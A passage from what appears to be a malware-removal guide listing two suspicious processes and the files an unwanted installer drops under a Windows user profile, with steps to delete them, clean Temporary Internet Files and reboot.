5827498a25abb_ua.exe:2980
run-setup.exe:3884
- Delete the original Application file.
- Delete or disinfect the following files created/modified by the Application:
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\318DR7NG\index[1].htm (7653 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\30EV4AVE\index[1].htm (6816 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss585D.tmp\inetc.dll (64 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\A3UADNX3.txt (117 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\NJKJZZRQ.txt (114 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss585D.tmp\5827498a25abb_ua.exe (297179 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Internet Explorer\MSIMGSIZ.DAT (384 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\30EV4AVE\normal_bg[1].jpg (1160 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GPS1JHSL\appImg[1].jpg (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ii_start.txt (607 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Setup__2140_il2.exe (51498 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\cpSetup.exe (52307 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiC41.tmp\NSISdl.dll (30 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\sevensetup.exe (3263 bytes)
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.